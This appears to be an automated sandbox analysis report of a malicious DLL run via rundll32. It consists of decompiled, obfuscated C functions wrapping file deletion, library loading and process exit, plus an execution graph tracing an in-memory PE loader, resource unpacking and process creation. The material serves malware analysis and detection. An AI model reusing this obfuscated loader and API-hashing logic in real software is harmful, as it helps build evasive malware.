                                                                                                                      • Instruction ID: b6fcb4d07e1764d7f8367379d95e31066fb88136e55ecc4775debcbc2e2a55aa
                                                                                                                      • Opcode Fuzzy Hash: 1a010bb4209eebcabefe83886664eafcedc3f71cda4b3a4488a61dc91c7b4f8b
                                                                                                                      • Instruction Fuzzy Hash: FD11CE72C0121CFBCF05DFE4D94A88DBBB1EB14308F20C098F915A6265E3729B64AF81
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0022BAB0 Relevance: 1.5, APIs: 1, Instructions: 40fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E0022BAB0(WCHAR* __ecx, void* __edx, intOrPtr _a4) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				void* _t30;
				int _t37;
				WCHAR* _t40;

				_push(_a4);
				_t40 = __ecx;
				_push(__ecx);
				E0022CF25(_t30);
				_v12 = 0xf8a4b;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0xa9327f6f;
				_v12 = _v12 ^ 0x26166746;
				_v12 = _v12 ^ 0x8f266abd;
				_v16 = 0xc512b4;
				_v16 = _v16 ^ 0xa05564f8;
				_v16 = _v16 | 0x9f0a4514;
				_v16 = _v16 ^ 0xbf9c633f;
				_v8 = 0x850486;
				_v8 = _v8 * 0x26;
				_v8 = _v8 + 0xffff9e70;
				_v8 = _v8 >> 0xf;
				_v8 = _v8 ^ 0x00077990;
				E00222D9F(0x7bb5ca56, 0xa2, __ecx, 0xa62ab78c);
				_t37 = DeleteFileW(_t40); // executed
				return _t37;
			}









                                                                                                                      0x0022bab7
                                                                                                                      0x0022baba
                                                                                                                      0x0022babd
                                                                                                                      0x0022babe
                                                                                                                      0x0022bac3
                                                                                                                      0x0022bacd
                                                                                                                      0x0022bad1
                                                                                                                      0x0022bad8
                                                                                                                      0x0022badf
                                                                                                                      0x0022bae6
                                                                                                                      0x0022baed
                                                                                                                      0x0022baf4
                                                                                                                      0x0022bafb
                                                                                                                      0x0022bb02
                                                                                                                      0x0022bb1d
                                                                                                                      0x0022bb20
                                                                                                                      0x0022bb27
                                                                                                                      0x0022bb2b
                                                                                                                      0x0022bb3b
                                                                                                                      0x0022bb44
                                                                                                                      0x0022bb4a

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.521762770.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.521755216.0000000000220000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.521781158.0000000000245000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: DeleteFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4033686569-0
                                                                                                                      • Opcode ID: 142492e115de819e337085e0760341fc4d7c13ea390934f1e7f80fc7c158108e
                                                                                                                      • Instruction ID: f1ca87f37957425a424458a63fd19b363435eb9e362aef7755df6a82eab40afd
                                                                                                                      • Opcode Fuzzy Hash: 142492e115de819e337085e0760341fc4d7c13ea390934f1e7f80fc7c158108e
                                                                                                                      • Instruction Fuzzy Hash: CC01F374C01218BBDB54EFA5C98A4DEBFB4EF00300F208189E825AA215D7B41B559F96
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002407D7 Relevance: 1.5, APIs: 1, Instructions: 40libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 86%
                                                                                                                      			E002407D7(void* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t30;
				struct HINSTANCE__* _t39;
				signed int _t41;

				_push(_a8);
				_push(_a4);
				E0022CF25(_t30);
				_v12 = 0x89457d;
				_v12 = _v12 ^ 0x6b886c65;
				_v12 = _v12 | 0xf6315bef;
				_v12 = _v12 ^ 0xff319cd3;
				_v8 = 0xe31a0f;
				_t41 = 0xa;
				_v8 = _v8 * 0x1b;
				_v8 = _v8 << 5;
				_v8 = _v8 ^ 0xfe799add;
				_v16 = 0x93f3d7;
				_v16 = _v16 / _t41;
				_v16 = _v16 ^ 0x00076e75;
				E00222D9F(0xe1be5824, 0x1e6, _t41, 0xa62ab78c);
				_t39 = LoadLibraryW(_a4); // executed
				return _t39;
			}









                                                                                                                      0x002407dd
                                                                                                                      0x002407e0
                                                                                                                      0x002407e5
                                                                                                                      0x002407ea
                                                                                                                      0x002407f4
                                                                                                                      0x002407fd
                                                                                                                      0x00240804
                                                                                                                      0x0024080b
                                                                                                                      0x00240818
                                                                                                                      0x0024081f
                                                                                                                      0x00240822
                                                                                                                      0x00240826
                                                                                                                      0x0024082d
                                                                                                                      0x0024083e
                                                                                                                      0x00240841
                                                                                                                      0x00240856
                                                                                                                      0x00240861
                                                                                                                      0x00240866

                                                                                                                      APIs
                                                                                                                      • LoadLibraryW.KERNEL32(FF319CD3), ref: 00240861
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.521762770.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.521755216.0000000000220000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.521781158.0000000000245000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: LibraryLoad
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1029625771-0
                                                                                                                      • Opcode ID: b5a7ff1cf00df94c7e0cce40bb031e72467efb4d89ba6605bf6ea92949dc313d
                                                                                                                      • Instruction ID: 052b6af613ddd228fc97159cdbe02e081719728e45761e67307958f62f73c983
                                                                                                                      • Opcode Fuzzy Hash: b5a7ff1cf00df94c7e0cce40bb031e72467efb4d89ba6605bf6ea92949dc313d
                                                                                                                      • Instruction Fuzzy Hash: 8C011075D0520CFBCB08EFE4D94A98EBBB1EB40304F208099A915AB261E7B15B649F80
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0023E2C5 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 81%
                                                                                                                      			E0023E2C5(void* __ecx, void* __edx, intOrPtr _a4, struct _SHFILEOPSTRUCTW* _a8) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				void* _t30;
				int _t37;

				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0022CF25(_t30);
				_v16 = 0x8c64b0;
				_v16 = _v16 + 0x962b;
				_v16 = _v16 >> 8;
				_v16 = _v16 ^ 0x000da62a;
				_v12 = 0xb02c29;
				_v12 = _v12 * 0x73;
				_v12 = _v12 + 0xffff997c;
				_v12 = _v12 ^ 0x4f272bd9;
				_v8 = 0x94952e;
				_v8 = _v8 + 0xa237;
				_v8 = _v8 ^ 0xcd764018;
				_v8 = _v8 + 0x8874;
				_v8 = _v8 ^ 0xcdeaa0fe;
				E00222D9F(0x2326b427, 0x2d, __ecx, 0xe4d0349b);
				_t37 = SHFileOperationW(_a8); // executed
				return _t37;
			}








                                                                                                                      0x0023e2cb
                                                                                                                      0x0023e2ce
                                                                                                                      0x0023e2d2
                                                                                                                      0x0023e2d3
                                                                                                                      0x0023e2d8
                                                                                                                      0x0023e2e2
                                                                                                                      0x0023e2e9
                                                                                                                      0x0023e2ed
                                                                                                                      0x0023e2f4
                                                                                                                      0x0023e30c
                                                                                                                      0x0023e30f
                                                                                                                      0x0023e316
                                                                                                                      0x0023e31d
                                                                                                                      0x0023e324
                                                                                                                      0x0023e32b
                                                                                                                      0x0023e332
                                                                                                                      0x0023e339
                                                                                                                      0x0023e349
                                                                                                                      0x0023e354
                                                                                                                      0x0023e359

                                                                                                                      APIs
                                                                                                                      • SHFileOperationW.SHELL32(000DA62A), ref: 0023E354
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.521762770.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.521755216.0000000000220000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.521781158.0000000000245000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FileOperation
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3080627654-0
                                                                                                                      • Opcode ID: df6e4e8d08ba67a79e6cc9105b91064a7161cfa041adeded471142a79e914314
                                                                                                                      • Instruction ID: d5753667ee4a773a2c526b0b6b7b9301d095ba73a6b1c5ccae5b1c116f74c460
                                                                                                                      • Opcode Fuzzy Hash: df6e4e8d08ba67a79e6cc9105b91064a7161cfa041adeded471142a79e914314
                                                                                                                      • Instruction Fuzzy Hash: 2E0113B1C00308FBDF51DFE8E94A88DBBB0EF00314F20C188E81466255E7B58B589F41
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00233CBB Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00233CBB() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _t37;

				_v20 = _v20 & 0x00000000;
				_v24 = 0x868838;
				_v16 = 0xb6c7ac;
				_t37 = 0x79;
				_v16 = _v16 * 0x7d;
				_v16 = _v16 ^ 0x593c5b8b;
				_v8 = 0x23929;
				_v8 = _v8 | 0xd856564b;
				_v8 = _v8 << 0xd;
				_v8 = _v8 >> 1;
				_v8 = _v8 ^ 0x67f2afdd;
				_v12 = 0x42ac5b;
				_v12 = _v12 / _t37;
				_v12 = _v12 ^ 0x0009f0c4;
				E00222D9F(0x8cff02b7, 0x12e, _t37, 0xa62ab78c);
				ExitProcess(0);
			}









                                                                                                                      0x00233cc1
                                                                                                                      0x00233cc7
                                                                                                                      0x00233cce
                                                                                                                      0x00233cdb
                                                                                                                      0x00233ce2
                                                                                                                      0x00233ce5
                                                                                                                      0x00233cec
                                                                                                                      0x00233cf3
                                                                                                                      0x00233cfa
                                                                                                                      0x00233cfe
                                                                                                                      0x00233d01
                                                                                                                      0x00233d08
                                                                                                                      0x00233d19
                                                                                                                      0x00233d1c
                                                                                                                      0x00233d31
                                                                                                                      0x00233d3b

                                                                                                                      APIs
                                                                                                                      • ExitProcess.KERNEL32(00000000), ref: 00233D3B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.521762770.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.521755216.0000000000220000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.521781158.0000000000245000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ExitProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 621844428-0
                                                                                                                      • Opcode ID: dd524d5e584c69c4875a986859085bb36bd1bb49e57c992e29c8257b5ff704c2
                                                                                                                      • Instruction ID: 38dea9cfe88328c5918c71727ff0b0c646d40e89ecfd507dcc25a4188e3de249
                                                                                                                      • Opcode Fuzzy Hash: dd524d5e584c69c4875a986859085bb36bd1bb49e57c992e29c8257b5ff704c2
                                                                                                                      • Instruction Fuzzy Hash: CF01E2B6D0120CFBDB04DFE5D946A9DBBB0EB40304F508199E925AB290D7B85B54DF41
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0023FC96 Relevance: 1.3, APIs: 1, Instructions: 41stringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 80%
                                                                                                                      			E0023FC96(void* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				void* _t32;
				int _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0022CF25(_t32);
				_v8 = 0x178fa1;
				_v8 = _v8 | 0x2f4d5c19;
				_v8 = _v8 + 0xda24;
				_t42 = 0x35;
				_v8 = _v8 / _t42;
				_v8 = _v8 ^ 0x00e923af;
				_v16 = 0xca5f26;
				_v16 = _v16 << 0xe;
				_v16 = _v16 ^ 0x97c71065;
				_v12 = 0xeb54f5;
				_v12 = _v12 >> 4;
				_v12 = _v12 ^ 0x0000b8cd;
				E00222D9F(0xb8f00729, 0x289, _t42, 0xa62ab78c);
				_t40 = lstrcmpiW(_a12, _a4); // executed
				return _t40;
			}









                                                                                                                      0x0023fc9c
                                                                                                                      0x0023fc9f
                                                                                                                      0x0023fca2
                                                                                                                      0x0023fca7
                                                                                                                      0x0023fcac
                                                                                                                      0x0023fcb6
                                                                                                                      0x0023fcbf
                                                                                                                      0x0023fccb
                                                                                                                      0x0023fcd3
                                                                                                                      0x0023fcd6
                                                                                                                      0x0023fcdd
                                                                                                                      0x0023fce4
                                                                                                                      0x0023fce8
                                                                                                                      0x0023fcef
                                                                                                                      0x0023fcf6
                                                                                                                      0x0023fcfa
                                                                                                                      0x0023fd15
                                                                                                                      0x0023fd23
                                                                                                                      0x0023fd28

                                                                                                                      APIs
                                                                                                                      • lstrcmpiW.KERNEL32(?,0000B8CD), ref: 0023FD23
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.521762770.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.521755216.0000000000220000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.521781158.0000000000245000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrcmpi
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1586166983-0
                                                                                                                      • Opcode ID: bcaea3a6b408ae5b0ea271ecf45cf18554c4d7f2312cff19f50c51f1dc53bf3d
                                                                                                                      • Instruction ID: 2830f45d3f6a0726058c68c9db63d9e697c0b1210a1759e70e15ad57801c51e1
                                                                                                                      • Opcode Fuzzy Hash: bcaea3a6b408ae5b0ea271ecf45cf18554c4d7f2312cff19f50c51f1dc53bf3d
                                                                                                                      • Instruction Fuzzy Hash: 60010276D00208BFDF05EFE4D94A89EBBB1AB44304F108098E9146A250DBB69B649F41
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:16%
                                                                                                                      Dynamic/Decrypted Code Coverage:16.2%
                                                                                                                      Signature Coverage:0%
                                                                                                                      Total number of Nodes:297
                                                                                                                      Total number of Limit Nodes:23
                                                                                                                      execution_graph 31784 10035042 TlsGetValue 31785 10035076 GetModuleHandleA 31784->31785 31786 10035055 31784->31786 31788 10035085 GetProcAddress 31785->31788 31789 1003509f 31785->31789 31786->31785 31787 1003505f TlsGetValue 31786->31787 31791 1003506a 31787->31791 31790 1003506e 31788->31790 31790->31789 31792 10035095 RtlEncodePointer 31790->31792 31791->31785 31791->31790 31792->31789 31793 10020c26 31796 10020c32 __EH_prolog3 31793->31796 31795 10020c80 31820 100206c8 EnterCriticalSection TlsGetValue LeaveCriticalSection LeaveCriticalSection 31795->31820 31796->31795 31804 1002083b EnterCriticalSection 31796->31804 31818 100201f1 RaiseException __CxxThrowException@8 31796->31818 31819 1002094b TlsAlloc InitializeCriticalSection 31796->31819 31800 10020c8d 31801 10020c93 31800->31801 31802 10020ca6 ~_Task_impl 31800->31802 31821 100209ed 88 API calls 5 library calls 31801->31821 31810 1002085a 31804->31810 31805 1002092a LeaveCriticalSection 31805->31796 31806 10020893 31822 10014460 31806->31822 31807 100208a8 GlobalHandle GlobalUnlock 31809 10014460 ctype 80 API calls 31807->31809 31812 100208c5 GlobalReAlloc 31809->31812 31810->31806 31810->31807 31817 10020916 _memset 31810->31817 31813 100208cf 31812->31813 31814 100208f7 GlobalLock 31813->31814 31815 100208da GlobalHandle GlobalLock 31813->31815 31816 100208e8 LeaveCriticalSection 31813->31816 31814->31817 31815->31816 31816->31814 31817->31805 31819->31796 31820->31800 31821->31802 31823 10014477 ctype 31822->31823 31824 1001448c GlobalAlloc 31823->31824 31826 10013ba0 80 API calls _DebugHeapAllocator 31823->31826 31824->31813 31826->31824 31827 10030d06 31828 10030d12 31827->31828 31829 10030d0d 31827->31829 31833 10030c10 31828->31833 31845 1003906d GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 31829->31845 31832 10030d23 31834 10030c1c _raise 31833->31834 31835 10030cb9 _raise 31834->31835 31839 10030c69 31834->31839 31846 10030a37 31834->31846 31835->31832 31839->31835 31900 100125c0 31839->31900 31840 10030c99 31840->31835 31841 10030a37 __CRT_INIT@12 165 API calls 31840->31841 31841->31835 31842 100125c0 ___DllMainCRTStartup 146 API calls 31843 10030c90 31842->31843 31844 10030a37 __CRT_INIT@12 165 API calls 31843->31844 31844->31840 31845->31828 31847 10030b61 31846->31847 31848 10030a4a GetProcessHeap HeapAlloc 31846->31848 31850 10030b67 31847->31850 31851 10030b9c 31847->31851 31849 10030a6e GetVersionExA 31848->31849 31865 10030a67 31848->31865 31852 10030a89 GetProcessHeap HeapFree 31849->31852 31853 10030a7e GetProcessHeap HeapFree 31849->31853 31858 10030b86 31850->31858 31850->31865 31948 100310be 67 API calls _doexit 31850->31948 31854 10030ba1 31851->31854 31855 10030bfa 31851->31855 31856 10030ab5 31852->31856 31853->31865 31932 10035135 6 API calls __decode_pointer 31854->31932 31855->31865 31967 10035425 79 API calls 2 library calls 31855->31967 31922 10036624 HeapCreate 31856->31922 31858->31865 31949 100389ee 68 API calls __crtCompareStringA_stat 31858->31949 31859 10030ba6 31933 10035840 31859->31933 31865->31839 31866 10030aeb 31866->31865 31869 10030af4 31866->31869 31867 10030b90 31950 10035178 70 API calls 2 library calls 31867->31950 31939 1003548e 78 API calls 6 library calls 31869->31939 31871 10030bbe 31952 100350ae TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress 31871->31952 31873 10030af9 __RTC_Initialize 31879 10030b0c GetCommandLineA 31873->31879 31893 10030afd 31873->31893 31874 10030b95 31951 1003667e VirtualFree HeapFree HeapFree HeapDestroy 31874->31951 31876 10030bd0 31880 10030bd7 31876->31880 31881 10030bee 31876->31881 31941 10038d66 77 API calls 3 library calls 31879->31941 31953 100351b5 67 API calls 4 library calls 31880->31953 31954 1002fa69 31881->31954 31885 10030b1c 31942 100387ae 72 API calls 3 library calls 31885->31942 31886 10030bde GetCurrentThreadId 31886->31865 31888 10030b26 31889 10030b2a 31888->31889 31944 10038cad 111 API calls 3 library calls 31888->31944 31943 10035178 70 API calls 2 library calls 31889->31943 31892 10030b36 31894 10030b4a 31892->31894 31945 10038a3a 110 API calls 6 library calls 31892->31945 31940 1003667e VirtualFree HeapFree HeapFree HeapDestroy 31893->31940 31899 10030b02 31894->31899 31947 100389ee 68 API calls __crtCompareStringA_stat 31894->31947 31897 10030b3f 31897->31894 31946 10030f4d 75 API calls 3 library calls 31897->31946 31899->31865 31993 10006a90 31900->31993 31903 1001265a 32027 1002fe65 105 API calls 6 library calls 31903->32027 31904 1001261c FindResourceW LoadResource SizeofResource 31907 10006a90 ___DllMainCRTStartup 67 API calls 31904->31907 31910 10012744 ___DllMainCRTStartup 31907->31910 31909 1001284d 31909->31840 31909->31842 31911 100127b7 VirtualAlloc 31910->31911 31912 1001279b VirtualAllocExNuma 31910->31912 31913 100127da 31911->31913 31912->31913 31998 1002fb00 31913->31998 31917 100127fa 32021 10002970 31917->32021 31919 10012810 ___DllMainCRTStartup 32024 100026a0 31919->32024 31921 10012664 32028 1002f81e 5 API calls __invoke_watson 31921->32028 31923 10036647 31922->31923 31924 10036644 31922->31924 31968 100365c9 67 API calls 3 library calls 31923->31968 31924->31866 31926 1003664c 31927 10036656 31926->31927 31928 1003667a 31926->31928 31969 10035aca HeapAlloc 31927->31969 31928->31866 31930 10036660 31930->31928 31931 10036665 HeapDestroy 31930->31931 31931->31924 31932->31859 31934 10035844 31933->31934 31936 10030bb2 31934->31936 31937 10035864 Sleep 31934->31937 31970 10030678 31934->31970 31936->31865 31936->31871 31938 10035879 31937->31938 31938->31934 31938->31936 31939->31873 31940->31899 31941->31885 31942->31888 31943->31893 31944->31892 31945->31897 31946->31894 31947->31889 31948->31858 31949->31867 31950->31874 31951->31865 31952->31876 31953->31886 31955 1002fa75 _raise 31954->31955 31956 1002faee __dosmaperr _raise 31955->31956 31966 1002fab4 31955->31966 31989 10035a99 67 API calls 2 library calls 31955->31989 31956->31899 31958 1002fac9 HeapFree 31958->31956 31959 1002fadb 31958->31959 31992 100311f4 67 API calls __getptd_noexit 31959->31992 31961 1002fae0 GetLastError 31961->31956 31962 1002faa6 31991 1002fabf LeaveCriticalSection _doexit 31962->31991 31963 1002fa8c ___sbh_find_block 31963->31962 31990 10035b3d VirtualFree VirtualFree HeapFree _memmove_s 31963->31990 31966->31956 31966->31958 31967->31865 31968->31926 31969->31930 31971 10030684 _raise 31970->31971 31972 1003069c 31971->31972 31982 100306bb _memset 31971->31982 31983 100311f4 67 API calls __getptd_noexit 31972->31983 31974 100306a1 31984 10037753 4 API calls 2 library calls 31974->31984 31975 100306b1 _raise 31975->31934 31977 1003072d RtlAllocateHeap 31977->31982 31982->31975 31982->31977 31985 10035a99 67 API calls 2 library calls 31982->31985 31986 100362e6 5 API calls 2 library calls 31982->31986 31987 10030774 LeaveCriticalSection _doexit 31982->31987 31988 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 31982->31988 31983->31974 31985->31982 31986->31982 31987->31982 31988->31982 31989->31963 31990->31962 31991->31966 31992->31961 31994 1002f9a6 _malloc 67 API calls 31993->31994 31996 10006aa1 31994->31996 31995 10006aad 31995->31903 31995->31904 31996->31995 31997 1002fa69 __crtCompareStringA_stat 67 API calls 31996->31997 31997->31995 31999 1002fb18 31998->31999 32000 1002fb3f __VEC_memcpy 31999->32000 32001 100127eb 31999->32001 32000->32001 32002 1002f9a6 32001->32002 32003 1002fa53 32002->32003 32014 1002f9b4 32002->32014 32036 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32003->32036 32005 1002fa59 32037 100311f4 67 API calls __getptd_noexit 32005->32037 32008 1002fa5f 32008->31917 32011 1002fa17 RtlAllocateHeap 32011->32014 32012 1002f9c9 32012->32014 32029 10036892 67 API calls __NMSG_WRITE 32012->32029 32030 100366f2 67 API calls 6 library calls 32012->32030 32031 10030e7b GetModuleHandleA GetProcAddress ExitProcess ___crtCorExitProcess 32012->32031 32014->32011 32014->32012 32015 1002fa4a 32014->32015 32016 1002fa3e 32014->32016 32019 1002fa3c 32014->32019 32032 1002f957 67 API calls 4 library calls 32014->32032 32033 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32014->32033 32015->31917 32034 100311f4 67 API calls __getptd_noexit 32016->32034 32035 100311f4 67 API calls __getptd_noexit 32019->32035 32022 1002f9a6 _malloc 67 API calls 32021->32022 32023 10002990 32022->32023 32023->31919 32038 10002280 32024->32038 32027->31921 32028->31909 32029->32012 32030->32012 32032->32014 32033->32014 32034->32019 32035->32015 32036->32005 32037->32008 32075 10001990 32038->32075 32041 100022c3 SetLastError 32072 100022a9 32041->32072 32042 100022d5 32043 10001990 ___DllMainCRTStartup SetLastError 32042->32043 32044 100022ee 32043->32044 32045 10002310 SetLastError 32044->32045 32046 10002322 32044->32046 32044->32072 32045->32072 32047 10002331 SetLastError 32046->32047 32048 10002343 32046->32048 32047->32072 32049 1000234e SetLastError 32048->32049 32053 10002360 GetNativeSystemInfo 32048->32053 32049->32072 32051 10002414 SetLastError 32051->32072 32052 10002426 VirtualAlloc 32054 10002472 GetProcessHeap HeapAlloc 32052->32054 32055 10002447 VirtualAlloc 32052->32055 32053->32051 32053->32052 32057 100024ac 32054->32057 32058 1000248c VirtualFree SetLastError 32054->32058 32055->32054 32056 10002463 SetLastError 32055->32056 32056->32072 32059 10001990 ___DllMainCRTStartup SetLastError 32057->32059 32058->32072 32060 1000250e 32059->32060 32061 10002512 32060->32061 32062 1000251c VirtualAlloc 32060->32062 32113 10002840 VirtualFree VirtualFree GetProcessHeap HeapFree ___DllMainCRTStartup 32061->32113 32063 1000254b ___DllMainCRTStartup 32062->32063 32078 100019c0 32063->32078 32066 1000257f ___DllMainCRTStartup 32066->32061 32088 10001ff0 32066->32088 32070 100025e8 ___DllMainCRTStartup 32070->32061 32070->32072 32107 1cd80c 32070->32107 32072->31921 32073 1000264f SetLastError 32073->32061 32076 100019ab 32075->32076 32077 1000199f SetLastError 32075->32077 32076->32041 32076->32042 32076->32072 32077->32076 32079 100019f0 32078->32079 32080 10001a83 32079->32080 32081 10001a2c VirtualAlloc 32079->32081 32087 10001aa0 ___DllMainCRTStartup 32079->32087 32082 10001990 ___DllMainCRTStartup SetLastError 32080->32082 32083 10001a50 32081->32083 32085 10001a57 ___DllMainCRTStartup 32081->32085 32084 10001a9c 32082->32084 32083->32087 32086 10001aa4 VirtualAlloc 32084->32086 32084->32087 32085->32079 32086->32087 32087->32066 32089 10002029 IsBadReadPtr 32088->32089 32098 1000201f 32088->32098 32091 10002053 32089->32091 32089->32098 32092 10002085 SetLastError 32091->32092 32093 10002099 32091->32093 32091->32098 32092->32098 32114 100018b0 VirtualQuery VirtualFree VirtualAlloc ___DllMainCRTStartup 32093->32114 32095 100020b3 32096 100020bf SetLastError 32095->32096 32100 100020e9 32095->32100 32096->32098 32098->32061 32101 10001cb0 32098->32101 32099 100021f9 SetLastError 32099->32098 32100->32098 32100->32099 32102 10001cf8 ___DllMainCRTStartup 32101->32102 32103 10001e01 32102->32103 32105 10001ddd 32102->32105 32115 10001b80 32102->32115 32104 10001b80 ___DllMainCRTStartup 2 API calls 32103->32104 32104->32105 32105->32070 32108 1cd8cc 32107->32108 32109 1cd8a5 32107->32109 32108->32072 32108->32073 32122 1c5cf9 32109->32122 32113->32072 32114->32095 32116 10001b9c 32115->32116 32119 10001b92 32115->32119 32117 10001c04 VirtualProtect 32116->32117 32120 10001baa 32116->32120 32117->32119 32119->32102 32120->32119 32121 10001be2 VirtualFree 32120->32121 32121->32119 32129 1c6288 32122->32129 32123 1c648d 32146 1b9700 32123->32146 32126 1c648b 32126->32108 32135 1c3cbb 32126->32135 32129->32123 32129->32126 32131 1bab66 GetPEB 32129->32131 32134 1bae03 GetPEB 32129->32134 32138 1cfc96 32129->32138 32142 1bea7b 32129->32142 32156 1d1310 32129->32156 32160 1d12a8 GetPEB 32129->32160 32161 1be7ce GetPEB 32129->32161 32162 1ce35a GetPEB 32129->32162 32131->32129 32134->32129 32136 1b2d9f GetPEB 32135->32136 32137 1c3d36 ExitProcess 32136->32137 32137->32108 32139 1cfcac 32138->32139 32163 1b2d9f 32139->32163 32143 1bea9f 32142->32143 32144 1b2d9f GetPEB 32143->32144 32145 1beb24 SHGetFolderPathW 32144->32145 32145->32129 32147 1b972e 32146->32147 32148 1d1310 GetPEB 32147->32148 32149 1b9995 32148->32149 32171 1c679c 32149->32171 32151 1b99dc 32151->32126 32152 1b99d1 32152->32151 32175 1c4dad GetPEB 32152->32175 32154 1b99fc 32176 1c4dad GetPEB 32154->32176 32157 1d132d 32156->32157 32177 1b3efe 32157->32177 32160->32129 32161->32129 32162->32129 32164 1b2e5b 32163->32164 32165 1b2e80 lstrcmpiW 32163->32165 32169 1cc761 GetPEB 32164->32169 32165->32129 32167 1b2e6a 32170 1bf2c1 GetPEB 32167->32170 32169->32167 32170->32165 32172 1c67d5 32171->32172 32173 1b2d9f GetPEB 32172->32173 32174 1c6847 CreateProcessW 32173->32174 32174->32152 32175->32154 32176->32151 32178 1b3f17 32177->32178 32181 1b3cd1 32178->32181 32182 1b3cec 32181->32182 32183 1b2d9f GetPEB 32182->32183 32184 1b3d79 32183->32184 32184->32129

                                                                                                                      Executed Functions

                                                                                                                      Function 100125C0 Relevance: 45.7, APIs: 7, Strings: 19, Instructions: 165memoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10006A90: _malloc.LIBCMT ref: 10006A9C
                                                                                                                      • _printf.LIBCMT ref: 1001265F
                                                                                                                      • FindResourceW.KERNEL32(00000000,00001705,DASHBOARD), ref: 1001268A
                                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 1001269B
                                                                                                                      • SizeofResource.KERNEL32(00000000,00000000), ref: 100126AC
